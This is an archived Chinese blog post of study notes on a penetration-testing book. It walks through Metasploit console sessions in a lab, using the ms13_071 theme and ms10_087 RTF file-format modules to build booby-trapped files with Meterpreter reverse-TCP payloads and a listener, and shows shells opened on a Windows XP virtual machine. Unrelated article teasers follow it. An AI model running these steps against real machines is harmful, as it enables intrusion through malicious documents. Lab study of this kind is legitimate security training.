【2014-06-05】某《魔鬼训练营》读书笔记:metasploit生成特定格式漏洞文件
[历史归档]本文原发布于 cstriker1407.info 个人博客内容为历史存档仅供参考。发布时间2014-06-05 标题某《魔鬼训练营》读书笔记metasploit生成特定格式漏洞文件分类操作系统 / 安全 标签metasploit某《魔鬼训练营》读书笔记metasploit生成特定格式漏洞文件第一种使用方式不通过handler直接连接第二种使用方式通过handler连接笔记仅供学习交流使用请勿进行其他用途Metasploit自带了很多漏洞文件生成模块这里只笔记下最简单的使用rootkali:~# msfconsole。。。。。。 。。。。。。 msfsearch fileformat#搜索可用模块Matching ModulesName Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 。。。。。。第一种使用方式不通过handler直接连接msfuse exploit/windows/fileformat/ms13_071_theme msf exploit(ms13_071_theme)show payloads Compatible PayloadsName Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。。 。。。。。。。 msf exploit(ms13_071_theme)setpayload windows/meterpreter/reverse_tcp payloadwindows/meterpreter/reverse_tcp msf exploit(ms13_071_theme)show options Module options(exploit/windows/fileformat/ms13_071_theme): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.themeyesThe themefileSRVHOST0.0.0.0yesThelocalhostto listen on. This must be an address on thelocalmachine or0.0.0.0 SRVPORT445yesThelocalport to listen on. SSLfalseno Negotiate SSLforincoming connections SSLCert no Path to a custom SSL certificate(default is randomly generated)SSLVersion SSL3 no Specify the version of SSL that should be used(accepted: SSL2, SSL3, TLS1)UNCPATH no Override the UNC path to use(Ex:\\192.168.1.1\share\exploit.scr)Payload options(windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC processyesExit technique: seh, thread, process, none LHOSTyesThe listen address LPORT4444yesThe listen port Exploit target: Id Name -- ----0Windows XP SP3 / Windows2003SP2 msf exploit(ms13_071_theme)setLHOST192.168.19.128 LHOST192.168.19.128 msf exploit(ms13_071_theme)exploit[*]Exploit running as background job.[*]Started reverse handler on192.168.19.128:4444 msf exploit(ms13_071_theme)[*]Generating our malicious executable...[*]Creatingmsf.themefile...[]msf.theme stored at /root/.msf4/local/msf.theme[]Let your victimopenmsf.theme[*]Ready to deliver your payload on\\192.168.19.128\mEjIom\pDuQX.scr[*]Server started.#此时在windows上打开文件msf.theme点击【 屏幕保护 】选项卡会触发漏洞如下[*]Sending stage(769024bytes)to192.168.19.129[*]Meterpreter session1opened(192.168.19.128:4444 -192.168.19.129:1155)at2014-06-0421:45:19 0800 msf exploit(ms13_071_theme)sessions Active sessionsId Type Information Connection -- ---- ----------- ----------1meterpreter x86/win32 WINXP-PRO-VM\Administrator WINXP-PRO-VM192.168.19.128:4444 -192.168.19.129:1155(192.168.19.129)msf exploit(ms13_071_theme)sessions-i1[*]Starting interaction with1... meterpretersysinfo Computer:WINXP-PRO-VM OS:Windows XP(Build2600, Service Pack2). Architecture:x86 System Language:zh_CN Meterpreter:x86/win32 meterpreter第二种使用方式通过handler连接msfuse exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof)show payloads Compatible PayloadsName Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 。。。。。。 msf exploit(ms10_087_rtf_pfragments_bof)setpayload windows/meterpreter/reverse_tcp payloadwindows/meterpreter/reverse_tcp msf exploit(ms10_087_rtf_pfragments_bof)show options Module options(exploit/windows/fileformat/ms10_087_rtf_pfragments_bof): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.rtfyesThefilename. Payload options(windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC processyesExit technique: seh, thread, process, none LHOSTyesThe listen address LPORT4444yesThe listen port Exploit target: Id Name -- ----0Automatic msf exploit(ms10_087_rtf_pfragments_bof)setLHOST192.168.19.128#将LHOST设置为本地IPLHOST192.168.19.128 msf exploit(ms10_087_rtf_pfragments_bof)setLPORT8888#手动设置下LPORTLPORT8888msf exploit(ms10_087_rtf_pfragments_bof)exploit[*]Creatingmsf.rtffile...[]msf.rtf stored at /root/.msf4/local/msf.rtf msf exploit(ms10_087_rtf_pfragments_bof)back msfuse exploit/multi/handler#切换到handler模块msf exploit(handler)setpayload windows/meterpreter/reverse_tcp payloadwindows/meterpreter/reverse_tcp msf exploit(handler)show options Module options(exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options(windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC processyesExit technique: seh, thread, process, none LHOSTyesThe listen address LPORT4444yesThe listen port Exploit target: Id Name -- ----0Wildcard Target msf exploit(handler)setLHOST192.168.19.128#设置好本地监听IPLHOST192.168.19.128 msf exploit(handler)setLPORT8888#设置好本地监听端口LPORT8888msf exploit(handler)exploit[*]Started reverse handler on192.168.19.128:8888[*]Starting the payload handler...#在windows上打开msf.rtf文件会触发漏洞如下[*]Sending stage(769024bytes)to192.168.19.129[*]Meterpreter session2opened(192.168.19.128:8888 -192.168.19.129:1163)at2014-06-0421:53:35 0800 meterpretersysinfo Computer:WINXP-PRO-VM OS:Windows XP(Build2600, Service Pack2). Architecture:x86 System Language:zh_CN Meterpreter:x86/win32 meterpreter

相关新闻

软件测试边界值分析法:原理、应用与实战技巧详解

软件测试边界值分析法:原理、应用与实战技巧详解

1. 项目概述:为什么边界值法值得你花时间深究?干了这么多年软件测试,我见过太多因为一个数字、一个字符没测到位而引发的线上事故。比如,一个电商平台的优惠券系统,满100减20,结果输入99.99元时&#xff0c…

2026/8/7 2:28:29 阅读更多 →
软著和专利根本就是两种不同的东西!90% 的创业者都搞混了

软著和专利根本就是两种不同的东西!90% 的创业者都搞混了

💡 一句话总结:软著保护代码,专利保护思想。选错了,你的知识产权可能一文不值。 🤔 为什么我要写这篇文章? 上周有个做 SaaS 的创业者找我咨询,花了 20 万申请了 5 项发明专利,结果…

2026/8/7 2:28:29 阅读更多 →
Poppins字体:打破语言边界的几何美学革命

Poppins字体:打破语言边界的几何美学革命

Poppins字体:打破语言边界的几何美学革命 【免费下载链接】Poppins Poppins, a Devanagari Latin family for Google Fonts. 项目地址: https://gitcode.com/gh_mirrors/po/Poppins 你是否曾为多语言设计项目而头疼?想象一下,你需要为…

2026/8/7 2:28:29 阅读更多 →

最新新闻

Tcl脚本管理Vivado工程:实现FPGA开发的可复现、可协作与自动化

Tcl脚本管理Vivado工程:实现FPGA开发的可复现、可协作与自动化

1. 从混乱到秩序:为什么我们需要Tcl脚本管理Vivado工程 如果你在FPGA开发领域摸爬滚打超过一年,大概率经历过这样的场景:项目中期,客户要求回退到两周前的某个版本进行验证。你打开Vivado,试图回忆当时到底修改了哪些I…

2026/8/7 3:18:56 阅读更多 →
最长公共子序列(LCS)算法详解:从动态规划原理到文本比对实战

最长公共子序列(LCS)算法详解:从动态规划原理到文本比对实战

1. 项目概述:从“找茬”游戏到算法核心如果你玩过“找茬”游戏,或者对比过两版合同、两份代码的差异,那你已经在直觉上运用了“最长公共子序列”的核心思想。它要解决的,就是在一堆看似杂乱的信息中,精准定位出那些“顺…

2026/8/7 3:18:56 阅读更多 →
Godot 4.0新2D地图编辑器:半小时搭建星露谷风格农场场景

Godot 4.0新2D地图编辑器:半小时搭建星露谷风格农场场景

1. 项目概述与核心价值如果你和我一样,是个独立游戏开发者或者对用Godot引擎做点小玩意儿感兴趣,那你肯定对《星露谷物语》那种精致、治愈的像素风农场场景心动过。但一想到要手动摆放成千上万个瓦片(Tile)来构建地形、道路、河流…

2026/8/7 3:18:56 阅读更多 →
深入解析PX4 ECL EKF:从卡尔曼滤波原理到多传感器融合实践

深入解析PX4 ECL EKF:从卡尔曼滤波原理到多传感器融合实践

1. 从“黑盒”到“白盒”:为什么我们需要深究PX4 ECL EKF的推导 如果你正在使用PX4飞控进行无人机开发,或者对组合导航算法有浓厚的兴趣,那么“扩展卡尔曼滤波”这几个字对你来说一定不陌生。在PX4的导航系统中,ECL EKF&#xff0…

2026/8/7 3:18:56 阅读更多 →
Linux服务器Java环境部署全攻略:从JDK安装到Spring Boot服务化

Linux服务器Java环境部署全攻略:从JDK安装到Spring Boot服务化

1. 从零到一:为什么你的Linux服务器需要一个专属的Java环境 如果你刚接手一台崭新的Linux服务器,或者准备在云上部署一个Java应用,第一件事很可能就是安装JDK和部署JAR包。这听起来像是开发运维的“Hello World”,但很多人恰恰在这…

2026/8/7 3:18:56 阅读更多 →
AI副驾驶如何赋能产品经理:从需求分析到数据验证的实战指南

AI副驾驶如何赋能产品经理:从需求分析到数据验证的实战指南

1. 从“产品经理”到“产品驾驶员”:为什么我们需要一个副驾驶?最近和几个老朋友吃饭,聊起各自的工作,发现一个挺有意思的现象:无论是大厂还是创业公司的产品经理,大家的口头禅都变成了“太卷了”。这种“卷…

2026/8/7 3:17:55 阅读更多 →

日新闻

为什么scrcpy成为Android投屏的终极解决方案:完整实战指南

为什么scrcpy成为Android投屏的终极解决方案:完整实战指南

为什么scrcpy成为Android投屏的终极解决方案:完整实战指南 【免费下载链接】scrcpy Display and control your Android device 项目地址: https://gitcode.com/GitHub_Trending/sc/scrcpy 想要将Android手机屏幕完美投射到电脑上,享受大屏操作的自…

2026/8/7 0:00:19 阅读更多 →
如何在5分钟内掌握Tom Select:打造现代化表单选择器的终极指南

如何在5分钟内掌握Tom Select:打造现代化表单选择器的终极指南

如何在5分钟内掌握Tom Select:打造现代化表单选择器的终极指南 【免费下载链接】tom-select Tom Select is a lightweight (~16kb gzipped) hybrid of a textbox and select box. Forked from selectize.js to provide a framework agnostic autocomplete widget wi…

2026/8/7 0:00:19 阅读更多 →
5分钟快速上手:NSZ压缩工具终极指南,轻松管理Switch游戏文件

5分钟快速上手:NSZ压缩工具终极指南,轻松管理Switch游戏文件

5分钟快速上手:NSZ压缩工具终极指南,轻松管理Switch游戏文件 【免费下载链接】nsz NSZ - Homebrew compatible NSP/XCI compressor/decompressor 项目地址: https://gitcode.com/gh_mirrors/ns/nsz 你是否在为Nintendo Switch游戏文件占用大量存储…

2026/8/7 0:00:19 阅读更多 →

周新闻

最大流算法详解:从水管网络到Ford-Fulkerson与Dinic实战

最大流算法详解:从水管网络到Ford-Fulkerson与Dinic实战

1. 从水管网络到最大流:一个核心问题的诞生想象一下,你是一个城市供水系统的总工程师。你的城市有多个水源(水库),需要通过一个复杂的地下管道网络,将水输送到各个居民区。每条管道都有其最大通水能力&…

2026/8/6 22:02:27 阅读更多 →
基于Springboot的企业门户网站(源码+LW+调试文档+讲解)

基于Springboot的企业门户网站(源码+LW+调试文档+讲解)

温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台…

2026/8/6 22:02:27 阅读更多 →
MATLAB xcorr函数详解:从互相关原理到四大实战应用

MATLAB xcorr函数详解:从互相关原理到四大实战应用

1. 从一次信号“找茬”说起:为什么我们需要互相关几年前,我在处理一组声学传感器数据时遇到了一个棘手的问题。我有两个麦克风记录了一段相同的音频信号,理论上它们接收到的声音波形应该非常相似,只是由于麦克风位置不同&#xff…

2026/8/6 22:02:27 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/5 23:28:39 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/6 22:02:28 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/5 23:46:51 阅读更多 →